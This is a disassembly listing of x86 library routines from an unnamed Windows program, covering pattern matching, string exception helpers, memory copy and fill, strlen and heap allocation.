sub_4153B5 proc near ; CODE XREF: sub_4010B9�j
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_4153D6
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_4153D6: ; CODE XREF: sub_4153B5+19�j
push ebx
push esi
loc_4153D8: ; CODE XREF: sub_4153B5+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_4153E6
cmp [ebp+var_4], eax
jnz short loc_415432
loc_4153E6: ; CODE XREF: sub_4153B5+2A�j
test edi, edi
jnz short loc_415427
cmp bl, 2Dh
jnz short loc_41541B
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_41541B
cmp al, 5Dh
jz short loc_41541B
cmp [ebp+var_4], edi
jnz short loc_41541B
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_415427
cmp bl, al
jg short loc_415427
push 1
mov [edx], esi
pop edi
jmp short loc_415427
; ---------------------------------------------------------------------------
loc_41541B: ; CODE XREF: sub_4153B5+38�j
; sub_4153B5+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_415427
push 1
pop edi
loc_415427: ; CODE XREF: sub_4153B5+33�j
; sub_4153B5+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_4153D8
; ---------------------------------------------------------------------------
loc_415432: ; CODE XREF: sub_4153B5+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_41543F
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_41543F: ; CODE XREF: sub_4153B5+82�j
cmp edi, eax
jnz short loc_415448
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_415448: ; CODE XREF: sub_4153B5+8C�j
mov eax, edi
pop edi
leave
retn
sub_4153B5 endp
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415473 proc near ; CODE XREF: sub_40129E�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_41548F: ; CODE XREF: sub_415473+3A�j
cmp [eax], bl
jz short loc_4154AF
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_4154A4
cmp cl, 2Ah
jnz short loc_4154AF
cmp cl, 3Fh
jnz short loc_4154A7
loc_4154A4: ; CODE XREF: sub_415473+25�j
inc eax
mov [edi], eax
loc_4154A7: ; CODE XREF: sub_415473+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_41548F
; ---------------------------------------------------------------------------
loc_4154AF: ; CODE XREF: sub_415473+1E�j
; sub_415473+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_4154BA
inc dword ptr [esi]
jmp short loc_4154AF
; ---------------------------------------------------------------------------
loc_4154BA: ; CODE XREF: sub_415473+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_4154DB
mov edx, [esi]
cmp [edx], bl
jz short loc_4154CC
xor eax, eax
jmp short loc_41553B
; ---------------------------------------------------------------------------
loc_4154CC: ; CODE XREF: sub_415473+53�j
cmp cl, bl
jnz short loc_4154DB
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_4154DB
push 1
pop eax
jmp short loc_41553B
; ---------------------------------------------------------------------------
loc_4154DB: ; CODE XREF: sub_415473+4D�j
; sub_415473+5B�j ...
push eax
push dword ptr [esi]
call sub_401113
pop ecx
test eax, eax
pop ecx
jnz short loc_415525
loc_4154E9: ; CODE XREF: sub_415473+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_4154ED: ; CODE XREF: sub_415473+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_415505
cmp cl, 5Bh
jz short loc_415505
cmp dl, bl
jz short loc_415505
inc eax
mov [edi], eax
jmp short loc_4154ED
; ---------------------------------------------------------------------------
loc_415505: ; CODE XREF: sub_415473+82�j
; sub_415473+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_41551C
push eax
push dword ptr [esi]
call sub_401113
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_415521
; ---------------------------------------------------------------------------
loc_41551C: ; CODE XREF: sub_415473+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_415521: ; CODE XREF: sub_415473+A7�j
cmp eax, ebx
jnz short loc_4154E9
loc_415525: ; CODE XREF: sub_415473+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_415538
mov eax, [esi]
cmp [eax], bl
jnz short loc_415538
mov [ebp+var_4], 1
loc_415538: ; CODE XREF: sub_415473+B6�j
; sub_415473+BC�j
mov eax, [ebp+var_4]
loc_41553B: ; CODE XREF: sub_415473+57�j
; sub_415473+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_415473 endp
; ---------------------------------------------------------------------------
db 33h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_415573 proc near ; CODE XREF: sub_4026AF+15�p
; sub_40271E+15�p ...
mov eax, offset loc_4250EC
call sub_4163B8
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_401050
mov esi, offset aStringTooLong ; "string too long"
push esi
call sub_4158E0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_4010F0
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4155CD
lea eax, [ebp-3Ch]
push offset dword_428250
push eax
mov dword ptr [ebp-3Ch], offset off_427588
call sub_4181A0
pop esi
sub_415573 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4155CD proc near ; CODE XREF: sub_415573+3F�p
; sub_41579F+3F�p
mov eax, offset loc_425100
call sub_4163B8
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset byte_4370BC
call sub_41803C
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_401050
push ds:dword_427084
mov ecx, edi
push 0
push ebx
call sub_401258
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_4275A8
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_4155CD endp
; =============== S U B R O U T I N E =======================================
sub_415631 proc near ; DATA XREF: .rdata:0042758C�o
; .rdata:004275AC�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_41563D
mov eax, offset dword_427094
locret_41563D: ; CODE XREF: sub_415631+5�j
retn
sub_415631 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41563E proc near ; DATA XREF: .rdata:004275B0�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4156B4
lea eax, [ebp+var_1C]
push offset dword_4282C0
push eax
call sub_4181A0
sub_41563E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41565B proc near ; CODE XREF: sub_415698+3�p
; DATA XREF: .rdata:004282C4�o
mov eax, offset loc_425114
call sub_4163B8
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4275A8
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_401050
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_4180E2
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_41565B endp
; =============== S U B R O U T I N E =======================================
sub_415698 proc near ; DATA XREF: .rdata:off_4275A8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_41565B
test [esp+4+arg_0], 1
jz short loc_4156AE
push esi
call sub_4158CA
pop ecx
loc_4156AE: ; CODE XREF: sub_415698+D�j
mov eax, esi
pop esi
retn 4
sub_415698 endp
; =============== S U B R O U T I N E =======================================
sub_4156B4 proc near ; CODE XREF: sub_41563E+A�p
; sub_415787+7�p ...
mov eax, offset loc_425128
call sub_4163B8
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_418079
mov al, [ebx+0Ch]
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov ecx, edi
mov [edi], al
call sub_401050
push ds:dword_427084
mov ecx, edi
push 0
push ebx
call sub_401258
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_4275A8
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_4156B4 endp
; =============== S U B R O U T I N E =======================================
sub_415711 proc near ; CODE XREF: sub_41576B+3�p
; DATA XREF: .rdata:00428254�o
mov eax, offset loc_42513C
call sub_4163B8
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4275A8
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_401050
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_4180E2
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_415711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41574E proc near ; DATA XREF: .rdata:00427590�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_415787
lea eax, [ebp+var_1C]
push offset dword_428250
push eax
call sub_4181A0
sub_41574E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41576B proc near ; DATA XREF: .rdata:off_427588�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_415711
test [esp+4+arg_0], 1
jz short loc_415781
push esi
call sub_4158CA
pop ecx
loc_415781: ; CODE XREF: sub_41576B+D�j
mov eax, esi
pop esi
retn 4
sub_41576B endp
; =============== S U B R O U T I N E =======================================
sub_415787 proc near ; CODE XREF: sub_41574E+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4156B4
mov dword ptr [esi], offset off_427588
mov eax, esi
pop esi
retn 4
sub_415787 endp
; =============== S U B R O U T I N E =======================================
sub_41579F proc near ; CODE XREF: sub_40278A+13�p
; sub_4029BE+E�p
mov eax, offset loc_425150
call sub_4163B8
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_401050
mov esi, offset aInvalidStringP ; "invalid string position"
push esi
call sub_4158E0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_4010F0
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4155CD
lea eax, [ebp-3Ch]
push offset dword_428378
push eax
mov dword ptr [ebp-3Ch], offset off_4275B8
call sub_4181A0
pop esi
sub_41579F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4157F9 proc near ; CODE XREF: sub_415853+3�p
; DATA XREF: .rdata:0042837C�o
mov eax, offset loc_425164
call sub_4163B8
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], offset off_4275A8
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_401050
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_4180E2
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_4157F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415836 proc near ; DATA XREF: .rdata:004275C0�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41586F
lea eax, [ebp+var_1C]
push offset dword_428378
push eax
call sub_4181A0
sub_415836 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415853 proc near ; DATA XREF: .rdata:off_4275B8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4157F9
test [esp+4+arg_0], 1
jz short loc_415869
push esi
call sub_4158CA
pop ecx
loc_415869: ; CODE XREF: sub_415853+D�j
mov eax, esi
pop esi
retn 4
sub_415853 endp
; =============== S U B R O U T I N E =======================================
sub_41586F proc near ; CODE XREF: sub_415836+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4156B4
mov dword ptr [esi], offset off_4275B8
mov eax, esi
pop esi
retn 4
sub_41586F endp
; =============== S U B R O U T I N E =======================================
sub_415887 proc near ; DATA XREF: .data:00429108�o
; FUNCTION CHUNK AT 004158BD SIZE 0000000C BYTES
test byte_492ADC, 1
jnz short loc_415897
or byte_492ADC, 1
loc_415897: ; CODE XREF: sub_415887+7�j
call sub_4158B1
test byte_492AE5, 1
jnz short loc_4158AC
or byte_492AE5, 1
loc_4158AC: ; CODE XREF: sub_415887+1C�j
jmp loc_4158BD
sub_415887 endp
; =============== S U B R O U T I N E =======================================
sub_4158B1 proc near ; CODE XREF: sub_415887:loc_415897�p
push offset j_nullsub_1
call sub_4167E0
pop ecx
retn
sub_4158B1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_415887
loc_4158BD: ; CODE XREF: sub_415887:loc_4158AC�j
push offset nullsub_2
call sub_4167E0
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_415887
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4158CA proc near ; CODE XREF: sub_402931+26�p
; sub_415698+10�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_415D6C
pop ecx
retn
sub_4158CA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4158E0 proc near ; CODE XREF: .text:004016E8�p
; sub_40196F+7�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_415900
loc_4158EC: ; CODE XREF: sub_4158E0+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_415933
test ecx, 3
jnz short loc_4158EC
add eax, 0
loc_415900: ; CODE XREF: sub_4158E0+A�j
; sub_4158E0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_415900
mov eax, [ecx-4]
test al, al
jz short loc_415951
test ah, ah
jz short loc_415947
test eax, 0FF0000h
jz short loc_41593D
test eax, 0FF000000h
jz short loc_415933
jmp short loc_415900
; ---------------------------------------------------------------------------
loc_415933: ; CODE XREF: sub_4158E0+11�j
; sub_4158E0+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41593D: ; CODE XREF: sub_4158E0+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415947: ; CODE XREF: sub_4158E0+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415951: ; CODE XREF: sub_4158E0+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4158E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415960 proc near ; CODE XREF: sub_401716+25�p
; sub_40175E+2E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_415980
cmp edi, eax
jb loc_415AF8
loc_415980: ; CODE XREF: sub_415960+16�j
test edi, 3
jnz short loc_41599C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4159BC
rep movsd
jmp ds:off_415AA8[edx*4]
; ---------------------------------------------------------------------------
loc_41599C: ; CODE XREF: sub_415960+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4159B4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4159BC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4159B4: ; CODE XREF: sub_415960+46�j
jmp dword ptr ds:loc_415AB8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4159BC: ; CODE XREF: sub_415960+31�j
; sub_415960+8E�j ...
jmp ds:off_415A3C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4159D0
dd offset loc_4159FC
dd offset loc_415A20
; ---------------------------------------------------------------------------
loc_4159D0: ; DATA XREF: sub_415960+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4159BC
rep movsd
jmp ds:off_415AA8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4159FC: ; DATA XREF: sub_415960+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4159BC
rep movsd
jmp ds:off_415AA8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_415A20: ; DATA XREF: sub_415960+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4159BC
rep movsd
jmp ds:off_415AA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_415A3C dd offset loc_415A9F ; DATA XREF: sub_415960:loc_4159BC�r
dd offset loc_415A8C
dd offset loc_415A84
dd offset loc_415A7C
dd offset loc_415A74
dd offset loc_415A6C
dd offset loc_415A64
dd offset loc_415A5C
; ---------------------------------------------------------------------------
loc_415A5C: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_415A64: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_415A6C: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_415A74: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_415A7C: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_415A84: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_415A8C: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_415A9F: ; CODE XREF: sub_415960:loc_4159BC�j
; DATA XREF: sub_415960:off_415A3C�o
jmp ds:off_415AA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_415AA8 dd offset loc_415AB8 ; DATA XREF: sub_415960+35�r
; sub_415960+92�r ...
dd offset loc_415AC0
dd offset loc_415ACC
dd offset loc_415AE0
; ---------------------------------------------------------------------------
loc_415AB8: ; CODE XREF: sub_415960+35�j
; sub_415960+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_415AC0: ; CODE XREF: sub_415960+35�j
; sub_415960+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415ACC: ; CODE XREF: sub_415960+35�j
; sub_415960+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_415AE0: ; CODE XREF: sub_415960+35�j
; sub_415960+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415AF8: ; CODE XREF: sub_415960+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_415B2C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_415B20
std
rep movsd
cld
jmp ds:off_415C40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_415B20: ; CODE XREF: sub_415960+1B1�j
; sub_415960+208�j ...
neg ecx
jmp ds:off_415BF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_415B2C: ; CODE XREF: sub_415960+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_415B44
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_415B44+4[eax*4]
; ---------------------------------------------------------------------------
loc_415B44: ; CODE XREF: sub_415960+1D6�j
; DATA XREF: sub_415960+1DD�r
jmp ds:off_415C40[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_415B58
dd offset loc_415B78
dd offset loc_415BA0
; ---------------------------------------------------------------------------
loc_415B58: ; DATA XREF: sub_415960+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_415B20
std
rep movsd
cld
jmp ds:off_415C40[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_415B78: ; DATA XREF: sub_415960+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_415B20
std
rep movsd
cld
jmp ds:off_415C40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_415BA0: ; DATA XREF: sub_415960+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_415B20
std
rep movsd
cld
jmp ds:off_415C40[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_415BF4
dd offset loc_415BFC
dd offset loc_415C04
dd offset loc_415C0C
dd offset loc_415C14
dd offset loc_415C1C
dd offset loc_415C24
off_415BF0 dd offset loc_415C37 ; DATA XREF: sub_415960+1C2�r
; ---------------------------------------------------------------------------
loc_415BF4: ; DATA XREF: sub_415960+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_415BFC: ; DATA XREF: sub_415960+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_415C04: ; DATA XREF: sub_415960+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_415C0C: ; DATA XREF: sub_415960+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_415C14: ; DATA XREF: sub_415960+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_415C1C: ; DATA XREF: sub_415960+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_415C24: ; DATA XREF: sub_415960+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_415C37: ; CODE XREF: sub_415960+1C2�j
; DATA XREF: sub_415960:off_415BF0�o
jmp ds:off_415C40[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_415C40 dd offset loc_415C50 ; DATA XREF: sub_415960+1B7�r
; sub_415960:loc_415B44�r ...
dd offset loc_415C58
dd offset loc_415C68
dd offset loc_415C7C
; ---------------------------------------------------------------------------
loc_415C50: ; CODE XREF: sub_415960+1B7�j
; sub_415960:loc_415B44�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415C58: ; CODE XREF: sub_415960+1B7�j
; sub_415960:loc_415B44�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415C68: ; CODE XREF: sub_415960+1B7�j
; sub_415960:loc_415B44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415C7C: ; CODE XREF: sub_415960+1B7�j
; sub_415960:loc_415B44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_415960 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415CA0 proc near ; CODE XREF: sub_401716+1A�p
; sub_40175E+22�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_415CF3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_415CE7
neg ecx
and ecx, 3
jz short loc_415CC9
sub edx, ecx
loc_415CC3: ; CODE XREF: sub_415CA0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_415CC3
loc_415CC9: ; CODE XREF: sub_415CA0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_415CE7
rep stosd
test edx, edx
jz short loc_415CED
loc_415CE7: ; CODE XREF: sub_415CA0+18�j
; sub_415CA0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_415CE7
loc_415CED: ; CODE XREF: sub_415CA0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_415CF3: ; CODE XREF: sub_415CA0+A�j
mov eax, [esp+arg_0]
retn
sub_415CA0 endp
; =============== S U B R O U T I N E =======================================
sub_415CF8 proc near ; CODE XREF: sub_401716+A�p
; sub_40175E+12�p ...
arg_0 = dword ptr 4
push dword_49284C
push [esp+4+arg_0]
call sub_415D0A
pop ecx
pop ecx
retn
sub_415CF8 endp
; =============== S U B R O U T I N E =======================================
sub_415D0A proc near ; CODE XREF: sub_415CF8+A�p
; sub_416765+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_415D33
loc_415D11: ; CODE XREF: sub_415D0A+27�j
push [esp+arg_0]
call sub_415D36
test eax, eax
pop ecx
jnz short locret_415D35
cmp [esp+arg_4], eax
jz short locret_415D35
push [esp+arg_0]
call sub_4181F0
test eax, eax
pop ecx
jnz short loc_415D11
loc_415D33: ; CODE XREF: sub_415D0A+5�j
xor eax, eax
locret_415D35: ; CODE XREF: sub_415D0A+13�j
; sub_415D0A+19�j
retn
sub_415D0A endp
; =============== S U B R O U T I N E =======================================
sub_415D36 proc near ; CODE XREF: sub_415D0A+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_435AC8
ja short loc_415D4E
push esi
call sub_41866D
test eax, eax
pop ecx
jnz short loc_415D6A
loc_415D4E: ; CODE XREF: sub_415D36+B�j
test esi, esi
jnz short loc_415D55
push 1
pop esi
loc_415D55: ; CODE XREF: sub_415D36+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_49426C
call ds:dword_495428 ; RtlAllocateHeap
loc_415D6A: ; CODE XREF: sub_415D36+16�j
pop esi
retn
sub_415D36 endp
; =============== S U B R O U T I N E =======================================
sub_415D6C proc near ; CODE XREF: sub_4017C8+A�p
; sub_4017E7+7B�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_415D99
push esi
call sub_418317
pop ecx
test eax, eax
push esi
jz short loc_415D8B
push eax
call sub_418342
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_415D8B: ; CODE XREF: sub_415D6C+13�j
push 0
push dword_49426C
call ds:dword_49542C ; RtlFreeHeap
loc_415D99: ; CODE XREF: sub_415D6C+7�j
pop esi
retn
sub_415D6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415D9B(double)
sub_415D9B proc near ; CODE XREF: sub_4020C1+38�p
